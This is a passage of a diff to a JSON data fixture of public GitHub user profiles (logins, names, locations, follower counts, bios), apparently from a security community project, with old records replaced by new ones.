"https://avatars.githubusercontent.com/u/52572301?v=4", "company": "", - "location": "Vancouver BC", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 3, - "public_gists_count": 6, - "public_repositories_count": 73, - "created_at": "2011-04-08T14:27:42Z", - "updated_at": "2024-08-09T16:24:34Z", - "node_id": "MDQ6VXNlcjcxNzU4NQ==", + "following_count": 10, + "followers_count": 12, + "public_gists_count": 3, + "public_repositories_count": 78, + "created_at": "2019-07-05T13:03:40Z", + "updated_at": "2024-06-15T12:43:43Z", + "node_id": "MDQ6VXNlcjUyNTcyMzAx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440853,49 +701777,49 @@ }, { "model": "github.user", - "pk": 3225, + "pk": 8635, "fields": { - "nest_created_at": "2024-09-13T05:17:15.320Z", - "nest_updated_at": "2024-09-14T19:26:45.818Z", - "name": "Joel Shaffer", - "login": "jrshaffe", + "nest_created_at": "2024-09-22T10:46:04.893Z", + "nest_updated_at": "2024-09-22T20:31:14.717Z", + "name": "Simos Xenitellis", + "login": "simos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/98034646?v=4", - "company": "VMware", - "location": "Detroit", + "avatar_url": "https://avatars.githubusercontent.com/u/37185?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 4, - "public_repositories_count": 22, - "created_at": "2022-01-19T14:13:17Z", - "updated_at": "2024-08-16T15:23:52Z", - "node_id": "U_kgDOBdfj1g", + "following_count": 17, + "followers_count": 45, + "public_gists_count": 24, + "public_repositories_count": 79, + "created_at": "2008-11-29T04:19:42Z", + "updated_at": "2024-07-12T22:05:43Z", + "node_id": "MDQ6VXNlcjM3MTg1", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "simosx" } }, { "model": "github.user", - "pk": 3226, + "pk": 8636, "fields": { - "nest_created_at": "2024-09-13T05:17:54.825Z", - "nest_updated_at": "2024-09-18T18:57:14.694Z", - "name": "", - "login": "marihstr", + "nest_created_at": "2024-09-22T10:46:05.521Z", + "nest_updated_at": "2024-09-22T20:31:15.332Z", + "name": "Vinoth kumar", + "login": "tutorgeeks", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77149911?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10381923?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-01-08T10:20:32Z", - "updated_at": "2024-07-30T07:03:20Z", - "node_id": "MDQ6VXNlcjc3MTQ5OTEx", + "following_count": 36, + "followers_count": 12, + "public_gists_count": 4, + "public_repositories_count": 69, + "created_at": "2015-01-03T15:40:45Z", + "updated_at": "2024-08-27T04:30:45Z", + "node_id": "MDQ6VXNlcjEwMzgxOTIz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440903,74 +701827,99 @@ }, { "model": "github.user", - "pk": 3227, + "pk": 8637, "fields": { - "nest_created_at": "2024-09-13T05:18:18.230Z", - "nest_updated_at": "2024-09-18T18:57:36.847Z", - "name": "Stefan Arzbach", - "login": "Lasitrox", + "nest_created_at": "2024-09-22T10:46:05.883Z", + "nest_updated_at": "2024-09-22T20:31:15.656Z", + "name": "Zach Riggle", + "login": "zachriggle", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60935446?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111640?v=4", + "company": "Apple", + "location": "Austin, TX", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-02-11T16:28:22Z", - "updated_at": "2024-06-18T14:07:07Z", - "node_id": "MDQ6VXNlcjYwOTM1NDQ2", + "following_count": 176, + "followers_count": 502, + "public_gists_count": 23, + "public_repositories_count": 108, + "created_at": "2009-08-04T01:28:49Z", + "updated_at": "2023-07-14T15:15:43Z", + "node_id": "MDQ6VXNlcjExMTY0MA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ebeip90" } }, { "model": "github.user", - "pk": 3228, + "pk": 8638, "fields": { - "nest_created_at": "2024-09-13T05:18:46.722Z", - "nest_updated_at": "2024-09-13T05:18:46.722Z", + "nest_created_at": "2024-09-22T10:46:06.553Z", + "nest_updated_at": "2024-09-22T20:31:16.286Z", "name": "", - "login": "mallikharjuna-K", + "login": "bjhulst", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/178186641?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30053806?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-08-12T15:09:10Z", - "updated_at": "2024-08-12T16:48:33Z", - "node_id": "U_kgDOCp7pkQ", - "bio": "", + "following_count": 1, + "followers_count": 11, + "public_gists_count": 3, + "public_repositories_count": 49, + "created_at": "2017-07-10T17:18:25Z", + "updated_at": "2023-02-24T08:26:44Z", + "node_id": "MDQ6VXNlcjMwMDUzODA2", + "bio": "\"When time permits I'm here\"", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3229, + "pk": 8639, "fields": { - "nest_created_at": "2024-09-13T05:18:47.371Z", - "nest_updated_at": "2024-09-18T18:58:04.158Z", + "nest_created_at": "2024-09-22T10:46:06.868Z", + "nest_updated_at": "2024-09-22T20:31:16.607Z", + "name": "bsysop", + "login": "bsysop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9998303?v=4", + "company": "Crowdsec", + "location": "", + "collaborators_count": 0, + "following_count": 143, + "followers_count": 201, + "public_gists_count": 6, + "public_repositories_count": 116, + "created_at": "2014-11-29T09:10:19Z", + "updated_at": "2024-07-25T18:42:48Z", + "node_id": "MDQ6VXNlcjk5OTgzMDM=", + "bio": "Infosec", + "is_hireable": true, + "twitter_username": "bsysop" + } +}, +{ + "model": "github.user", + "pk": 8640, + "fields": { + "nest_created_at": "2024-09-22T10:46:07.189Z", + "nest_updated_at": "2024-09-22T20:31:16.929Z", "name": "", - "login": "FarooqAftab", + "login": "DarkMristov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/161705457?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55538830?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-02-29T09:40:43Z", - "updated_at": "2024-09-10T09:18:12Z", - "node_id": "U_kgDOCaNt8Q", + "public_repositories_count": 8, + "created_at": "2019-09-19T10:59:56Z", + "updated_at": "2024-08-25T17:44:34Z", + "node_id": "MDQ6VXNlcjU1NTM4ODMw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440978,49 +701927,74 @@ }, { "model": "github.user", - "pk": 3230, + "pk": 8641, "fields": { - "nest_created_at": "2024-09-13T05:19:52.410Z", - "nest_updated_at": "2024-09-18T18:59:10.214Z", - "name": "CireSnave", - "login": "ciresnave", - "email": "ciresnave@yahoo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19400463?v=4", - "company": "Evans Laboratories Incorporated", - "location": "Arizona, USA, Earth", + "nest_created_at": "2024-09-22T10:46:07.508Z", + "nest_updated_at": "2024-09-22T20:31:17.240Z", + "name": "Dominic", + "login": "dee-see", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7252342?v=4", + "company": "GitLab", + "location": "Dublin, Ireland", "collaborators_count": 0, - "following_count": 60, - "followers_count": 12, + "following_count": 1, + "followers_count": 66, "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2016-05-17T03:11:51Z", - "updated_at": "2024-09-18T13:48:19Z", - "node_id": "MDQ6VXNlcjE5NDAwNDYz", + "public_repositories_count": 41, + "created_at": "2014-04-10T14:54:36Z", + "updated_at": "2024-09-21T15:31:08Z", + "node_id": "MDQ6VXNlcjcyNTIzNDI=", + "bio": "Security Engineer at @gitlabhq, loving all things hacking, code and automation.", + "is_hireable": false, + "twitter_username": "dee__see" + } +}, +{ + "model": "github.user", + "pk": 8642, + "fields": { + "nest_created_at": "2024-09-22T10:46:07.820Z", + "nest_updated_at": "2024-09-22T20:31:17.559Z", + "name": "Gregory Boddin", + "login": "gboddin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4395092?v=4", + "company": "", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 46, + "public_gists_count": 38, + "public_repositories_count": 118, + "created_at": "2013-05-10T09:25:17Z", + "updated_at": "2024-07-15T11:01:49Z", + "node_id": "MDQ6VXNlcjQzOTUwOTI=", "bio": "", - "is_hireable": true, - "twitter_username": "CireSnave" + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3231, + "pk": 8643, "fields": { - "nest_created_at": "2024-09-13T05:21:51.284Z", - "nest_updated_at": "2024-09-18T18:54:26.666Z", - "name": "JulienB", - "login": "burn1ngd0g", + "nest_created_at": "2024-09-22T10:46:08.143Z", + "nest_updated_at": "2024-09-22T20:31:17.865Z", + "name": "", + "login": "superman32432432", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/157806538?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7228420?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2024-01-26T12:17:59Z", - "updated_at": "2024-06-12T06:59:08Z", - "node_id": "U_kgDOCWfvyg", + "created_at": "2014-04-08T17:02:11Z", + "updated_at": "2019-05-24T06:46:18Z", + "node_id": "MDQ6VXNlcjcyMjg0MjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441028,224 +702002,224 @@ }, { "model": "github.user", - "pk": 3232, + "pk": 8644, "fields": { - "nest_created_at": "2024-09-13T05:22:02.013Z", - "nest_updated_at": "2024-09-13T05:22:02.013Z", - "name": "Adam Pietrzycki", - "login": "adampie", + "nest_created_at": "2024-09-22T10:46:08.459Z", + "nest_updated_at": "2024-09-22T20:31:18.189Z", + "name": "", + "login": "lmeyerov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1269580?v=4", - "company": "@zapier ", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/4249447?v=4", + "company": "Graphistry", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 22, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2011-12-17T13:09:16Z", - "updated_at": "2024-08-26T21:58:12Z", - "node_id": "MDQ6VXNlcjEyNjk1ODA=", - "bio": "Cloud Security at @zapier", + "following_count": 1, + "followers_count": 87, + "public_gists_count": 17, + "public_repositories_count": 38, + "created_at": "2013-04-24T21:06:26Z", + "updated_at": "2024-09-08T21:16:47Z", + "node_id": "MDQ6VXNlcjQyNDk0NDc=", + "bio": "Created: Louie.AI, Graphistry, Project Domino,\r\nfirst GPU dataframe, SocioPLT, first multicore browser, Flapjax (first JS FRP lib)\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "lmeyerov" } }, { "model": "github.user", - "pk": 3233, + "pk": 8645, "fields": { - "nest_created_at": "2024-09-13T05:22:02.702Z", - "nest_updated_at": "2024-09-18T18:53:57.829Z", - "name": "nitrocode", - "login": "nitrocode", + "nest_created_at": "2024-09-22T10:46:08.788Z", + "nest_updated_at": "2024-09-22T20:31:18.511Z", + "name": "", + "login": "blabut", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7775707?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33202324?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 93, - "followers_count": 99, - "public_gists_count": 77, - "public_repositories_count": 195, - "created_at": "2014-06-03T02:30:33Z", - "updated_at": "2024-09-06T03:35:10Z", - "node_id": "MDQ6VXNlcjc3NzU3MDc=", - "bio": "contact: https://bit.ly/2K7e76D | \r\nkeybase: https://bit.ly/39lPFad | \r\ncalendly: https://bit.ly/3x1jWaG", - "is_hireable": true, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2017-10-29T16:47:17Z", + "updated_at": "2024-08-10T22:24:55Z", + "node_id": "MDQ6VXNlcjMzMjAyMzI0", + "bio": "Pentester / Jazz lover", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3234, + "pk": 8646, "fields": { - "nest_created_at": "2024-09-13T05:22:03.380Z", - "nest_updated_at": "2024-09-13T05:22:03.380Z", - "name": "Nir Mesika", - "login": "nirmesika", + "nest_created_at": "2024-09-22T10:46:09.112Z", + "nest_updated_at": "2024-09-22T20:31:18.832Z", + "name": "Jeffrey Swan", + "login": "plan-do-break-fix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81566980?v=4", - "company": "Unity", - "location": "Tel-Aviv", + "avatar_url": "https://avatars.githubusercontent.com/u/61218880?v=4", + "company": "", + "location": "New Orleans, LA, USA", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-03-29T12:03:46Z", - "updated_at": "2024-08-08T17:35:44Z", - "node_id": "MDQ6VXNlcjgxNTY2OTgw", - "bio": "", + "public_repositories_count": 122, + "created_at": "2020-02-19T03:43:57Z", + "updated_at": "2023-11-20T15:54:32Z", + "node_id": "MDQ6VXNlcjYxMjE4ODgw", + "bio": "Work smarter and harder", "is_hireable": false, - "twitter_username": "" + "twitter_username": "j_sw4n" } }, { "model": "github.user", - "pk": 3235, + "pk": 8647, "fields": { - "nest_created_at": "2024-09-13T05:22:21.855Z", - "nest_updated_at": "2024-09-18T18:53:53.243Z", - "name": "", - "login": "Arszilla", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22989170?v=4", + "nest_created_at": "2024-09-22T10:46:09.426Z", + "nest_updated_at": "2024-09-22T20:31:19.146Z", + "name": "theyknow", + "login": "Prune2000", + "email": "theyknow-bb@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/35957528?v=4", "company": "", - "location": "", + "location": "Norway", "collaborators_count": 0, - "following_count": 51, - "followers_count": 59, + "following_count": 46, + "followers_count": 106, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2016-10-21T22:08:14Z", - "updated_at": "2024-09-16T20:40:23Z", - "node_id": "MDQ6VXNlcjIyOTg5MTcw", - "bio": "CISSP, CRTO, GWAPT, OSCP", + "public_repositories_count": 23, + "created_at": "2018-01-30T10:43:41Z", + "updated_at": "2024-02-05T12:09:13Z", + "node_id": "MDQ6VXNlcjM1OTU3NTI4", + "bio": "Pentester / bug bounty hunter / researcher", "is_hireable": true, - "twitter_username": "Arszilla" + "twitter_username": "victor_theyknow" } }, { "model": "github.user", - "pk": 3236, + "pk": 8648, "fields": { - "nest_created_at": "2024-09-13T05:22:32.574Z", - "nest_updated_at": "2024-09-18T18:53:35.256Z", - "name": "Martin Seckar", - "login": "mseckar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60925529?v=4", - "company": "Red Hat", - "location": "Brno, Czech Republic", + "nest_created_at": "2024-09-22T10:46:09.780Z", + "nest_updated_at": "2024-09-22T20:31:19.461Z", + "name": "Ryan T. Moran", + "login": "rtmor", + "email": "ryan@rtmoran.org", + "avatar_url": "https://avatars.githubusercontent.com/u/44214212?v=4", + "company": "", + "location": "Utica, New York", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-02-11T12:15:03Z", - "updated_at": "2024-09-09T13:04:13Z", - "node_id": "MDQ6VXNlcjYwOTI1NTI5", - "bio": "PM and InfoSec Analyst.\r\nMy old profile: @xsecka04", + "public_repositories_count": 20, + "created_at": "2018-10-16T21:45:13Z", + "updated_at": "2024-08-26T05:22:24Z", + "node_id": "MDQ6VXNlcjQ0MjE0MjEy", + "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3237, + "pk": 8649, "fields": { - "nest_created_at": "2024-09-13T16:17:29.285Z", - "nest_updated_at": "2024-09-18T18:21:19.926Z", - "name": "Ryan Armstrong", - "login": "ryarmst", + "nest_created_at": "2024-09-22T10:46:10.777Z", + "nest_updated_at": "2024-09-22T20:31:20.390Z", + "name": "Rbcafe", + "login": "Rbcafe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19736727?v=4", - "company": "@DigitalBoundaryGroup", - "location": "London, Ontario, Canada", + "avatar_url": "https://avatars.githubusercontent.com/u/2713634?v=4", + "company": "Rbcafe", + "location": "France", "collaborators_count": 0, - "following_count": 8, - "followers_count": 7, + "following_count": 18, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2016-06-03T19:45:35Z", - "updated_at": "2024-09-17T21:33:28Z", - "node_id": "MDQ6VXNlcjE5NzM2NzI3", - "bio": "Application security practitioner and trainer. PhD in biomedical engineering. Before infosec, graphics, game engines, surgical sim, and medical imaging.", - "is_hireable": true, - "twitter_username": "" + "public_repositories_count": 12, + "created_at": "2012-11-03T07:02:14Z", + "updated_at": "2024-07-30T18:16:57Z", + "node_id": "MDQ6VXNlcjI3MTM2MzQ=", + "bio": "Sécurité & Développement. | #Rbcafe | #BugBounty | #macOS", + "is_hireable": false, + "twitter_username": "rbcafe" } }, { "model": "github.user", - "pk": 3238, + "pk": 8650, "fields": { - "nest_created_at": "2024-09-13T16:27:28.159Z", - "nest_updated_at": "2024-09-14T18:51:00.641Z", - "name": "Shaheem", - "login": "FireCodeStudioHub", + "nest_created_at": "2024-09-22T10:46:11.106Z", + "nest_updated_at": "2024-09-22T20:31:20.711Z", + "name": "Paul", + "login": "PaulSec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/159974503?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4060683?v=4", "company": "", - "location": "", + "location": "France", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2024-02-14T02:02:09Z", - "updated_at": "2024-09-13T04:26:34Z", - "node_id": "U_kgDOCYkEZw", - "bio": "Security Researcher", + "following_count": 26, + "followers_count": 1311, + "public_gists_count": 68, + "public_repositories_count": 105, + "created_at": "2013-04-04T16:00:19Z", + "updated_at": "2024-09-02T16:00:21Z", + "node_id": "MDQ6VXNlcjQwNjA2ODM=", + "bio": "I can't promise anything but I'll do my best.", "is_hireable": true, - "twitter_username": "" + "twitter_username": "PaulWebSec" } }, { "model": "github.user", - "pk": 3239, + "pk": 8651, "fields": { - "nest_created_at": "2024-09-13T16:27:45.954Z", - "nest_updated_at": "2024-09-16T22:32:45.859Z", - "name": "Xhoenix", - "login": "Xhoenix", + "nest_created_at": "2024-09-22T10:46:11.441Z", + "nest_updated_at": "2024-09-22T20:31:21.022Z", + "name": "Mike Arpaia", + "login": "marpaia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86168235?v=4", - "company": "", - "location": "~/", + "avatar_url": "https://avatars.githubusercontent.com/u/927168?v=4", + "company": "@moonfire-ventures", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2021-06-19T19:33:39Z", - "updated_at": "2024-09-16T02:29:33Z", - "node_id": "MDQ6VXNlcjg2MTY4MjM1", - "bio": "", + "following_count": 52, + "followers_count": 388, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2011-07-20T07:18:15Z", + "updated_at": "2024-09-13T11:47:22Z", + "node_id": "MDQ6VXNlcjkyNzE2OA==", + "bio": "I am excited about machine learning, natural language processing, quantitative finance, and more! 😁", "is_hireable": true, - "twitter_username": "" + "twitter_username": "mikearpaia" } }, { "model": "github.user", - "pk": 3240, + "pk": 8652, "fields": { - "nest_created_at": "2024-09-13T16:54:46.463Z", - "nest_updated_at": "2024-09-14T19:18:06.378Z", + "nest_created_at": "2024-09-22T10:46:12.071Z", + "nest_updated_at": "2024-09-22T20:31:21.649Z", "name": "", - "login": "buke-narlitepe-itk", + "login": "Maks3w", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/134285237?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1301698?v=4", "company": "", - "location": "", + "location": "España (Spain)", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-05-22T11:27:09Z", - "updated_at": "2024-09-13T11:57:24Z", - "node_id": "U_kgDOCAEHtQ", + "following_count": 10, + "followers_count": 196, + "public_gists_count": 18, + "public_repositories_count": 163, + "created_at": "2012-01-03T17:27:29Z", + "updated_at": "2024-09-13T11:40:00Z", + "node_id": "MDQ6VXNlcjEzMDE2OTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441253,74 +702227,74 @@ }, { "model": "github.user", - "pk": 3241, + "pk": 8653, "fields": { - "nest_created_at": "2024-09-13T17:09:37.700Z", - "nest_updated_at": "2024-09-18T18:52:56.532Z", - "name": "Animesh Raj", - "login": "itsarraj", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/151125034?v=4", - "company": "", - "location": "Distributed", + "nest_created_at": "2024-09-22T10:46:12.387Z", + "nest_updated_at": "2024-09-22T20:31:21.967Z", + "name": "Kir Kolyshkin", + "login": "kolyshkin", + "email": "kolyshkin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4522509?v=4", + "company": "Red Hat", + "location": "Seattle, WA, USA", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2023-11-17T06:59:48Z", - "updated_at": "2024-09-18T02:43:30Z", - "node_id": "U_kgDOCQH8Kg", - "bio": "Hi, I'm Animesh Raj, a passionate Full-Stack Developer specializing in JavaScript and TypeScript.", + "following_count": 7, + "followers_count": 164, + "public_gists_count": 11, + "public_repositories_count": 162, + "created_at": "2013-05-24T20:12:30Z", + "updated_at": "2024-09-15T22:53:59Z", + "node_id": "MDQ6VXNlcjQ1MjI1MDk=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "kolyshkin" } }, { "model": "github.user", - "pk": 3242, + "pk": 8654, "fields": { - "nest_created_at": "2024-09-13T17:09:59.645Z", - "nest_updated_at": "2024-09-16T21:14:05.545Z", - "name": "Xin Zhang", - "login": "xzhang-ipipeline", + "nest_created_at": "2024-09-22T10:46:13.042Z", + "nest_updated_at": "2024-09-22T20:31:22.610Z", + "name": "Bhargav Saripalli", + "login": "Gituser143", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/128854385?v=4", - "company": "iPipeline Canada", - "location": "Canada", + "avatar_url": "https://avatars.githubusercontent.com/u/44526455?v=4", + "company": "Akamai", + "location": "Bengaluru, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-03-24T20:46:46Z", - "updated_at": "2024-05-13T14:10:18Z", - "node_id": "U_kgDOB64pcQ", - "bio": "", - "is_hireable": false, + "following_count": 91, + "followers_count": 97, + "public_gists_count": 1, + "public_repositories_count": 39, + "created_at": "2018-10-27T13:41:24Z", + "updated_at": "2024-08-28T12:10:59Z", + "node_id": "MDQ6VXNlcjQ0NTI2NDU1", + "bio": "Software Enginer II at Akamai Technologies. Gopher, Cloud, Networks and Security enthusiast. ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3243, + "pk": 8655, "fields": { - "nest_created_at": "2024-09-16T21:08:08.926Z", - "nest_updated_at": "2024-09-18T19:04:01.366Z", + "nest_created_at": "2024-09-22T10:46:13.354Z", + "nest_updated_at": "2024-09-22T20:31:22.920Z", "name": "", - "login": "sumetpong", + "login": "EONRaider", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/69327686?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15611424?v=4", "company": "", - "location": "", + "location": "Curitiba, Brazil", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-08-06T22:16:20Z", - "updated_at": "2024-09-16T15:11:55Z", - "node_id": "MDQ6VXNlcjY5MzI3Njg2", + "followers_count": 509, + "public_gists_count": 13, + "public_repositories_count": 37, + "created_at": "2015-11-02T12:52:28Z", + "updated_at": "2024-09-16T14:52:03Z", + "node_id": "MDQ6VXNlcjE1NjExNDI0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441328,49 +702302,49 @@ }, { "model": "github.user", - "pk": 3244, + "pk": 8656, "fields": { - "nest_created_at": "2024-09-16T21:14:06.551Z", - "nest_updated_at": "2024-09-18T18:52:37.253Z", - "name": "", - "login": "stevenkain", + "nest_created_at": "2024-09-22T10:46:13.999Z", + "nest_updated_at": "2024-09-22T20:31:23.542Z", + "name": "Alexander Steers", + "login": "steers", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29120732?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/415895?v=4", "company": "", - "location": "", + "location": "Waterloo, ON", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 7, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-06-01T11:00:48Z", - "updated_at": "2024-09-15T07:17:23Z", - "node_id": "MDQ6VXNlcjI5MTIwNzMy", + "public_repositories_count": 8, + "created_at": "2010-09-25T22:11:38Z", + "updated_at": "2024-09-19T16:23:23Z", + "node_id": "MDQ6VXNlcjQxNTg5NQ==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "steers" } }, { "model": "github.user", - "pk": 3245, + "pk": 8657, "fields": { - "nest_created_at": "2024-09-16T22:19:42.422Z", - "nest_updated_at": "2024-09-16T22:19:42.422Z", + "nest_created_at": "2024-09-22T10:46:14.317Z", + "nest_updated_at": "2024-09-22T20:31:23.853Z", "name": "", - "login": "lucamrgs", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39555424?v=4", + "login": "akkuman", + "email": "akkumans@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7813511?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-05-23T10:47:15Z", - "updated_at": "2024-09-03T12:18:07Z", - "node_id": "MDQ6VXNlcjM5NTU1NDI0", + "following_count": 1226, + "followers_count": 546, + "public_gists_count": 89, + "public_repositories_count": 174, + "created_at": "2014-06-06T07:58:49Z", + "updated_at": "2024-09-06T11:29:50Z", + "node_id": "MDQ6VXNlcjc4MTM1MTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441378,24 +702352,24 @@ }, { "model": "github.user", - "pk": 3246, + "pk": 8658, "fields": { - "nest_created_at": "2024-09-16T22:25:15.589Z", - "nest_updated_at": "2024-09-16T22:25:16.908Z", - "name": "", - "login": "JoeNuttall", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109506359?v=4", + "nest_created_at": "2024-09-22T10:46:25.401Z", + "nest_updated_at": "2024-09-22T20:32:05.723Z", + "name": "Felipe Ruiz", + "login": "fruizrob", + "email": "fruiz.rob@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26105689?v=4", "company": "", - "location": "", + "location": "Chile", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 29, + "followers_count": 39, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-07-18T07:04:21Z", - "updated_at": "2024-09-16T06:48:42Z", - "node_id": "U_kgDOBobvNw", + "public_repositories_count": 11, + "created_at": "2017-03-01T05:44:04Z", + "updated_at": "2024-08-19T14:52:26Z", + "node_id": "MDQ6VXNlcjI2MTA1Njg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441403,149 +702377,224 @@ }, { "model": "github.user", - "pk": 3247, + "pk": 8659, "fields": { - "nest_created_at": "2024-09-16T22:29:10.357Z", - "nest_updated_at": "2024-09-16T22:29:10.357Z", - "name": "Thomas Calderon", - "login": "calderonth", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/766422?v=4", + "nest_created_at": "2024-09-22T10:46:25.714Z", + "nest_updated_at": "2024-09-22T20:31:34.813Z", + "name": "Franco Mendez", + "login": "fnmendez", + "email": "f@francomendez.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20799436?v=4", "company": "", - "location": "", + "location": "Chile", "collaborators_count": 0, - "following_count": 1, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 33, - "created_at": "2011-05-03T20:02:19Z", - "updated_at": "2024-09-04T08:16:04Z", - "node_id": "MDQ6VXNlcjc2NjQyMg==", - "bio": "", + "following_count": 46, + "followers_count": 64, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2016-08-02T16:56:13Z", + "updated_at": "2024-08-26T18:48:02Z", + "node_id": "MDQ6VXNlcjIwNzk5NDM2", + "bio": "#bitcoin", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_francomendez" } }, { "model": "github.user", - "pk": 3248, + "pk": 8660, "fields": { - "nest_created_at": "2024-09-16T22:32:52.148Z", - "nest_updated_at": "2024-09-18T00:21:50.188Z", - "name": "Mahdi Moradi", - "login": "mmoradi-87", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11390495?v=4", + "nest_created_at": "2024-09-22T10:46:26.036Z", + "nest_updated_at": "2024-09-22T20:31:35.139Z", + "name": "Rodrigo Peña", + "login": "rodrigopv", + "email": "lrpena@miuandes.cl", + "avatar_url": "https://avatars.githubusercontent.com/u/198869?v=4", "company": "", - "location": "Tehran", + 